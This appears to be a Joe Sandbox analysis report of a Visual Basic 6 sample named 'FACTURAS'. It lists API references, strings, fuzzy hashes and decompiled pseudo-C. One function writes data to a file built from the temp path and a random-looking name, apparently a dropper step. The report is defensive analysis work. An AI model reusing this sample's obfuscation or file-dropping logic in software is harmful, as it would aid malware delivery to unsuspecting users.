0x0041ffbf
0x0041ffbf
0x0041ffd1
0x0041ffec
0x0041fff2
0x0041fff4
0x00420001
0x00420026
0x00420003
0x00420003
0x00420008
0x0042000d
0x00420013
0x00420019
0x0042001e
0x0042001e
0x00420037
0x00420041
0x00420049
0x0042004a
0x0042005b
0x00420063
0x0042006f
0x0042008c
0x00420071
0x00420071
0x00420076
0x0042007b
0x00420080
0x00420080
0x0042009e
0x004200b6
0x004200b9
0x004200bb
0x004200c8
0x004200ea
0x004200ca
0x004200ca
0x004200cc
0x004200d1
0x004200d7
0x004200dd
0x004200e2
0x004200e2
0x004200f4
0x0042010f
0x00420115
0x00420117
0x00420124
0x00420149
0x00420126
0x00420126
0x0042012b
0x00420130
0x00420136
0x0042013c
0x00420141
0x00420141
0x00420157
0x0042015e
0x0042015e
0x00420163
0x00420177
0x0042017d
0x0042017f
0x0042018c
0x004201ae
0x0042018e
0x0042018e
0x00420193
0x00420198
0x0042019b
0x004201a1
0x004201a6
0x004201a6
0x004201b5
0x004201bc
0x004201bf
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041FDF3
__vbaLenBstrB.MSVBVM60(EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE0A
#574.MSVBVM60(00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE1D
__vbaStrMove.MSVBVM60(00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER,?,?,?,?,00401396), ref: 0041FE27
#617.MSVBVM60(?,00000008,000000AE,?,?,?,00000003,?,?,?,?,EKSPROPRIATIONSFORRETNINGER), ref: 0041FE56
__vbaVarDup.MSVBVM60 ref: 0041FE78
#667.MSVBVM60(?), ref: 0041FE81
__vbaVarTstEq.MSVBVM60(00008008,?,?), ref: 0041FE98
__vbaFreeStr.MSVBVM60(00008008,?,?), ref: 0041FEA7
__vbaFreeVarList.MSVBVM60(00000005,00000003,00000008,?,?,00008008,00008008,?,?), ref: 0041FEC2
__vbaVarDup.MSVBVM60 ref: 0041FEF6
#528.MSVBVM60(?,?), ref: 0041FF03
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FF0C
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FF16
__vbaStrCopy.MSVBVM60(?,?,?), ref: 0041FF26
__vbaFreeStr.MSVBVM60(?,?,?), ref: 0041FF2E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FF3D
__vbaNew2.MSVBVM60(00402D44,004223F0), ref: 0041FF58
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041FFBA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000C8), ref: 00420019
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000C8), ref: 00420041
#546.MSVBVM60(?), ref: 0042004A
__vbaVarMove.MSVBVM60(?), ref: 0042005B
__vbaFreeVar.MSVBVM60(?), ref: 00420063
__vbaNew2.MSVBVM60(00402D44,004223F0,?), ref: 0042007B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 004200DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000140), ref: 0042013C
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000140), ref: 0042015E
#554.MSVBVM60 ref: 00420163
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000090), ref: 004201A1

Strings

userprofile, xrefs: 0041FE5B
EKSPROPRIATIONSFORRETNINGER, xrefs: 0041FE05
Wickiups, xrefs: 0041FED9

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$ListNew2$#528#546#554#574#617#667BstrChkstkCopy
String ID: EKSPROPRIATIONSFORRETNINGER$Wickiups$userprofile
API String ID: 3879572176-2473413249
Opcode ID: 0fc2fedb27963cd47a776e5663be3da4e72c06e501471585a9fd3d5b046025c2
Instruction ID: be31f4fdd39a4c97f810f30d0f3eda793f00d0cf2b229daf1530e70586788333
Opcode Fuzzy Hash: 0fc2fedb27963cd47a776e5663be3da4e72c06e501471585a9fd3d5b046025c2
Instruction Fuzzy Hash: 73B10771A00228AFDB20EF90DC45FEEB7B4BF04304F0445AAE509B71A1DBB95A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB1A, Relevance: 57.9, APIs: 30, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0041FB1A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				char* _v120;
				char _v128;
				short _v148;
				signed int _v152;
				signed int _v176;
				intOrPtr _t79;
				char* _t80;
				signed int _t85;
				short _t86;
				char* _t91;
				void* _t130;
				void* _t132;
				intOrPtr _t133;

				_t133 = _t132 - 0x18;
				 *[fs:0x0] = _t133;
				L00401390();
				_v28 = _t133;
				_v24 = 0x4012d8;
				_v20 = 0;
				_v16 = 0;
				_t79 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401396, _t130);
				_v8 = 1;
				L00401642();
				_v8 = 2;
				L00401474();
				_v56 = _t79;
				_v64 = 8;
				_t80 =  &_v64;
				_push(_t80);
				L0040147A();
				_v152 =  ~(0 | _t80 < 0x00000000);
				L00401606();
				if(_v152 != 0) {
					_v8 = 3;
					_v104 = 0x403334;
					_v112 = 8;
					L0040160C();
					_push( &_v64);
					_push( &_v80);
					L00401510();
					_v120 = L"\\M9XgMRXaN30mgEl56ja236";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t91 =  &_v96;
					_push(_t91);
					L004014EC();
					_push(_t91);
					L004015AC();
					L00401672();
					_push(_t91);
					_push(1);
					_push(0xffffffff);
					_push(0x20);
					L004014A4();
					L0040165A();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401654();
					_v8 = 4;
					_push( &_v64);
					L004014AA();
					_push(1);
					_push( &_v64);
					_push(0xffffffff);
					L0040149E();
					L00401606();
					_v8 = 5;
					_push(1);
					L00401498();
					_v8 = 6;
					_push(L"Turtled");
					L004015E2();
					L00401672();
					L00401642();
					L0040165A();
					_v8 = 7;
					_push(0xffffffff);
					L00401636();
					_v8 = 8;
					_v104 = 0x4034a4;
					_v112 = 8;
					L0040160C();
					_push( &_v64);
					_push(0xf7);
					L00401486();
					L00401672();
					L00401642();
					L0040165A();
					L00401606();
				}
				_v8 = 0xa;
				_t85 =  *((intOrPtr*)( *_a4 + 0x128))(_a4,  &_v148);
				asm("fclex");
				_v152 = _t85;
				if(_v152 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x402958);
					_push(_a4);
					_push(_v152);
					L00401624();
					_v176 = _t85;
				}
				_t86 = _v148;
				 *((intOrPtr*)(_a4 + 0xf8)) = _t86;
				_v8 = 0xb;
				_v44 = 0xf6927;
				_push(0x41fdaf);
				L0040165A();
				return _t86;
			}

0x0041fb1d
0x0041fb2c
0x0041fb38
0x0041fb40
0x0041fb43
0x0041fb4a
0x0041fb51
0x0041fb60
0x0041fb63
0x0041fb70
0x0041fb75
0x0041fb7c
0x0041fb81
0x0041fb84
0x0041fb8b
0x0041fb8e
0x0041fb8f
0x0041fb9e
0x0041fba8
0x0041fbb6
0x0041fbbc
0x0041fbc3
0x0041fbca
0x0041fbd7
0x0041fbdf
0x0041fbe3
0x0041fbe4
0x0041fbe9
0x0041fbf0
0x0041fbfa
0x0041fbfe
0x0041fbff
0x0041fc02
0x0041fc03
0x0041fc08
0x0041fc09
0x0041fc13
0x0041fc18
0x0041fc19
0x0041fc1b
0x0041fc1d
0x0041fc1f
0x0041fc27
0x0041fc2f
0x0041fc33
0x0041fc37
0x0041fc38
0x0041fc3a
0x0041fc42
0x0041fc4c
0x0041fc4d
0x0041fc52
0x0041fc57
0x0041fc58
0x0041fc5a
0x0041fc62
0x0041fc67
0x0041fc6e
0x0041fc70
0x0041fc75
0x0041fc7c
0x0041fc81
0x0041fc8b
0x0041fc9b
0x0041fca3
0x0041fca8
0x0041fcaf
0x0041fcb1
0x0041fcb6
0x0041fcbd
0x0041fcc4
0x0041fcd1
0x0041fcd9
0x0041fcda
0x0041fcdf
0x0041fce9
0x0041fcf9
0x0041fd01
0x0041fd09
0x0041fd09
0x0041fd0e
0x0041fd24
0x0041fd2a
0x0041fd2c
0x0041fd39
0x0041fd5b
0x0041fd3b
0x0041fd3b
0x0041fd40
0x0041fd45
0x0041fd48
0x0041fd4e
0x0041fd53
0x0041fd53
0x0041fd62
0x0041fd6c
0x0041fd72
0x0041fd79
0x0041fd80
0x0041fda9
0x0041fdae

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041FB38
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041FB70
#609.MSVBVM60(?,?,?,?,00401396), ref: 0041FB7C
#557.MSVBVM60(00000008), ref: 0041FB8F
__vbaFreeVar.MSVBVM60(00000008), ref: 0041FBA8
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0041FBD7
#666.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0041FBE4
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000008), ref: 0041FC03
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC09
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC13
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC1F
__vbaFreeStr.MSVBVM60(00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC27
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,?,00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC3A
#670.MSVBVM60(?,?,?,?,00401396), ref: 0041FC4D
__vbaPut3.MSVBVM60(000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC5A
__vbaFreeVar.MSVBVM60(000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC62
__vbaFileClose.MSVBVM60(00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC70
#527.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC81
__vbaStrMove.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC8B
__vbaStrCopy.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC9B
__vbaFreeStr.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FCA3
__vbaOnError.MSVBVM60(000000FF,Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FCB1
__vbaVarDup.MSVBVM60 ref: 0041FCD1
#606.MSVBVM60(000000F7,00000001), ref: 0041FCDF
__vbaStrMove.MSVBVM60(000000F7,00000001), ref: 0041FCE9
__vbaStrCopy.MSVBVM60(000000F7,00000001), ref: 0041FCF9
__vbaFreeStr.MSVBVM60(000000F7,00000001), ref: 0041FD01
__vbaFreeVar.MSVBVM60(000000F7,00000001), ref: 0041FD09
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000128), ref: 0041FD4E
__vbaFreeStr.MSVBVM60(0041FDAF), ref: 0041FDA9

Strings

tmp, xrefs: 0041FBC3
Turtled, xrefs: 0041FC7C
\M9XgMRXaN30mgEl56ja236, xrefs: 0041FBE9

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$Copy$File$#527#557#606#609#666#670CheckChkstkCloseErrorHresultListOpenPut3
String ID: Turtled$\M9XgMRXaN30mgEl56ja236$tmp
API String ID: 2486381916-2524811428
Opcode ID: 157cbad45e542fe91a6761dcfc4aa5d19feee70b6bc37dbd6e293d57ba4d5e1b
Instruction ID: f7bc1e11a1fb69ef982dce79c8c17b13ebc70ae086fc767ef643929e0427c024
Opcode Fuzzy Hash: 157cbad45e542fe91a6761dcfc4aa5d19feee70b6bc37dbd6e293d57ba4d5e1b
Instruction Fuzzy Hash: 3B613971D00208ABDB00EFA1D955BEEBBB8AF04308F10857AF515BB1E2DB795A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D85F, Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041D85F(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				void* _v40;
				char _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v72;
				short _v76;
				intOrPtr _v88;
				signed int _t44;
				char* _t48;
				char* _t50;
				signed int _t51;
				void* _t85;
				void* _t87;
				intOrPtr _t88;

				_t88 = _t87 - 0xc;
				 *[fs:0x0] = _t88;
				L00401390();
				_v16 = _t88;
				_v12 = 0x401218;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401396, _t85);
				L00401642();
				L00401642();
				_push(0x59);
				_t44 = _a4;
				_t11 = _t44 + 0x68; // 0x41df6f
				_push( *_t11);
				L00401564();
				L00401672();
				_push(_t44);
				_push(L"Argumentspecifikations7");
				L0040156A();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t44 + 1);
				L0040165A();
				_t48 = _v76;
				if(_t48 != 0) {
					_push(L"6:6:6");
					_push( &_v72);
					L0040155E();
					_t50 =  &_v72;
					_push(_t50);
					L004015AC();
					L00401672();
					L00401606();
					_push(0xf8);
					L00401558();
					L00401672();
					_push(_t50);
					L004015CA();
					L00401672();
					_t51 = _v56;
					_v88 = _t51;
					_v56 = _v56 & 0x00000000;
					_push(0xba);
					L00401672();
					_push(_t51);
					L00401564();
					L00401672();
					L00401642();
					_push( &_v56);
					_push( &_v52);
					_push( &_v48);
					_t48 =  &_v44;
					_push(_t48);
					_push(4);
					L0040159A();
					L00401630();
					_push(0x294);
					L00401552();
					L00401672();
				}
				_v36 = 0x4974;
				_push(0x41d9fb);
				L0040165A();
				L0040165A();
				L0040165A();
				return _t48;
			}

0x0041d862
0x0041d871
0x0041d87b
0x0041d883
0x0041d886
0x0041d88d
0x0041d89c
0x0041d8a5
0x0041d8b5
0x0041d8ba
0x0041d8bc
0x0041d8bf
0x0041d8bf
0x0041d8c2
0x0041d8cc
0x0041d8d1
0x0041d8d2
0x0041d8d7
0x0041d8de
0x0041d8e3
0x0041d8ea
0x0041d8ef
0x0041d8f5
0x0041d8fb
0x0041d903
0x0041d904
0x0041d909
0x0041d90c
0x0041d90d
0x0041d917
0x0041d91f
0x0041d924
0x0041d929
0x0041d933
0x0041d938
0x0041d939
0x0041d943
0x0041d948
0x0041d94b
0x0041d94e
0x0041d952
0x0041d95d
0x0041d962
0x0041d963
0x0041d96d
0x0041d97a
0x0041d982
0x0041d986
0x0041d98a
0x0041d98b
0x0041d98e
0x0041d98f
0x0041d991
0x0041d999
0x0041d99e
0x0041d9a3
0x0041d9ad
0x0041d9ad
0x0041d9b2
0x0041d9b8
0x0041d9e5
0x0041d9ed
0x0041d9f5
0x0041d9fa

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041D87B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041D8A5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041D8B5
#514.MSVBVM60(0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8C2
__vbaStrMove.MSVBVM60(0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8CC
__vbaStrCmp.MSVBVM60(Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8D7
__vbaFreeStr.MSVBVM60(Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8EA
#541.MSVBVM60(?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D904
__vbaStrVarMove.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D90D
__vbaStrMove.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D917
__vbaFreeVar.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D91F
#537.MSVBVM60(000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D929
__vbaStrMove.MSVBVM60(000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D933
#523.MSVBVM60(00000000,000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D939
__vbaStrMove.MSVBVM60(00000000,000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D943
__vbaStrMove.MSVBVM60(000000BA,00000000,000000F8,?,?), ref: 0041D95D
#514.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D963
__vbaStrMove.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D96D
__vbaStrCopy.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D97A
__vbaFreeStrList.MSVBVM60(00000004,0041DF6F,00000000,?,00000000,00000000,000000BA,00000000,000000F8,?,?), ref: 0041D991
#554.MSVBVM60(?,?,?,?,00401396), ref: 0041D999
#697.MSVBVM60(00000294,?,?,?,?,00401396), ref: 0041D9A3
__vbaStrMove.MSVBVM60(00000294,?,?,?,?,00401396), ref: 0041D9AD
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9E5
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9ED
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9F5

Strings

misingenuity, xrefs: 0041D8AA
6:6:6, xrefs: 0041D8FB
YtI, xrefs: 0041D9F2
tI, xrefs: 0041D9B2
Argumentspecifikations7, xrefs: 0041D8D2

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Move$Free$Copy$#514$#523#537#541#554#697ChkstkList
String ID: 6:6:6$Argumentspecifikations7$YtI$misingenuity$tI
API String ID: 365784744-4043548477
Opcode ID: 3ec3f6750185edeac3e82093cfae1c87a376d150741a778a584dcb4f40998412
Instruction ID: 21e61328ffb2c9d77808a42d182e75319979b759cfffe2f6dde1e49f5261a2e9
Opcode Fuzzy Hash: 3ec3f6750185edeac3e82093cfae1c87a376d150741a778a584dcb4f40998412
Instruction Fuzzy Hash: AA410071900108ABCB00FBA5CD62EEE7774AF54708F54853EF502BB1E1DE399A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB14, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041DB14(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				signed int _v84;
				signed int _v96;
				char* _t39;
				signed int _t46;
				void* _t57;
				void* _t59;
				intOrPtr _t60;

				_t60 = _t59 - 0xc;
				 *[fs:0x0] = _t60;
				L00401390();
				_v16 = _t60;
				_v12 = 0x401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401396, _t57);
				_v72 = L"Interpage";
				_v80 = 8;
				L0040160C();
				L0040154C();
				_t39 =  &_v28;
				L00401666();
				L00401546();
				L00401672();
				L00401642();
				L0040159A();
				L00401654();
				_t46 =  *((intOrPtr*)( *_a4 + 0xcc))(_a4, 0xffffffff, 2,  &_v48,  &_v64, 2,  &_v28,  &_v32, L"kystliniernes", L"bombasine", _t39, _t39,  &_v64, 1, 0xffffffff, 0,  &_v64,  &_v48);
				asm("fclex");
				_v84 = _t46;
				if(_v84 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xcc);
					_push(0x402958);
					_push(_a4);
					_push(_v84);
					L00401624();
					_v96 = _t46;
				}
				_push(0x41dc3e);
				return _t46;
			}

0x0041db17
0x0041db26
0x0041db30
0x0041db38
0x0041db3b
0x0041db42
0x0041db51
0x0041db54
0x0041db5b
0x0041db68
0x0041db75
0x0041db84
0x0041db88
0x0041db98
0x0041dba2
0x0041dbaf
0x0041dbbe
0x0041dbd0
0x0041dbe2
0x0041dbe8
0x0041dbea
0x0041dbf1
0x0041dc0d
0x0041dbf3
0x0041dbf3
0x0041dbf8
0x0041dbfd
0x0041dc00
0x0041dc03
0x0041dc08
0x0041dc08
0x0041dc11
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DB30
__vbaVarDup.MSVBVM60 ref: 0041DB68
#524.MSVBVM60(?,?), ref: 0041DB75
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?), ref: 0041DB88
#712.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DB98
__vbaStrMove.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBA2
__vbaStrCopy.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBAF
__vbaFreeStrList.MSVBVM60(00000002,?,?,kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBBE
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401396), ref: 0041DBD0
__vbaHresultCheckObj.MSVBVM60(00000000,00401238,00402958,000000CC), ref: 0041DC03

Strings

kystliniernes, xrefs: 0041DB93
bombasine, xrefs: 0041DB8E
Interpage, xrefs: 0041DB54

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$FreeList$#524#712CheckChkstkCopyHresultMove
String ID: Interpage$bombasine$kystliniernes
API String ID: 618982454-1576064046
Opcode ID: 4b7bad8fe5da4cf5b40be9b07913d5146003e66d3a156664da07939a24c2ea87
Instruction ID: d5bd6ed92dd3996f5a477f744a16af858393804ca444508ad559a81309d178f2
Opcode Fuzzy Hash: 4b7bad8fe5da4cf5b40be9b07913d5146003e66d3a156664da07939a24c2ea87
Instruction Fuzzy Hash: 99311CB1D00208BFDB00EF95CC46FDEBBB8AB04714F10852AF515BA1E1DBB896458B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA24, Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041DA24(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v44;
				signed int _v48;
				signed int _v60;
				signed int _t30;
				char* _t32;
				void* _t43;
				void* _t45;
				intOrPtr _t46;

				_t46 = _t45 - 0xc;
				 *[fs:0x0] = _t46;
				L00401390();
				_v16 = _t46;
				_v12 = 0x401228;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401396, _t43);
				_t30 =  *((intOrPtr*)( *_a4 + 0x6c))(_a4, 0x23);
				asm("fclex");
				_v48 = _t30;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x6c);
					_push(0x402958);
					_push(_a4);
					_push(_v48);
					L00401624();
					_v60 = _t30;
				}
				_push(0x4c);
				_push(0xb4);
				_push(0xf1);
				_push( &_v44);
				L004015A6();
				_t32 =  &_v44;
				_push(_t32);
				L004015AC();
				L00401672();
				L00401642();
				L0040165A();
				L00401606();
				_push(0x41daf5);
				return _t32;
			}

0x0041da27
0x0041da36
0x0041da40
0x0041da48
0x0041da4b
0x0041da52
0x0041da61
0x0041da6e
0x0041da71
0x0041da73
0x0041da7a
0x0041da93
0x0041da7c
0x0041da7c
0x0041da7e
0x0041da83
0x0041da86
0x0041da89
0x0041da8e
0x0041da8e
0x0041da97
0x0041da99
0x0041da9e
0x0041daa6
0x0041daa7
0x0041daac
0x0041daaf
0x0041dab0
0x0041daba
0x0041dac7
0x0041dacf
0x0041dad7
0x0041dadc
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DA40
__vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402958,0000006C), ref: 0041DA89
#539.MSVBVM60(?,000000F1,000000B4,0000004C), ref: 0041DAA7
__vbaStrVarMove.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAB0
__vbaStrMove.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DABA
__vbaStrCopy.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAC7
__vbaFreeStr.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DACF
__vbaFreeVar.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAD7

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$FreeMove$#539CheckChkstkCopyHresult
String ID:
API String ID: 650776751-0
Opcode ID: 5e920ef38ce66dec5c44c66ae8fc713f8ecd3dd4d8fe98e16d918be2900a290a
Instruction ID: 4abc8eda56edeec600c0a1a6dde69522d342d07e5f2e8bba58d99c84b58fff03
Opcode Fuzzy Hash: 5e920ef38ce66dec5c44c66ae8fc713f8ecd3dd4d8fe98e16d918be2900a290a
Instruction Fuzzy Hash: F7210371E40208AFDB00EFA5C856FDDBFB4AF08754F14842AF506BB1E1CBB995858B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042020D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042020D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v52;
				signed int _v56;
				signed int _t36;
				signed int _t37;
				void* _t47;
				void* _t49;
				intOrPtr _t50;

				_t50 = _t49 - 0xc;
				 *[fs:0x0] = _t50;
				L00401390();
				_v16 = _t50;
				_v12 = 0x401338;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x401396, _t47);
				L00401642();
				_t36 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v36);
				asm("fclex");
				_v40 = _t36;
				if(_v40 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0xa8);
					_push(0x402958);
					_push(_a4);
					_push(_v40);
					L00401624();
					_v56 = _t36;
				}
				_t37 = _v36;
				_v52 = _t37;
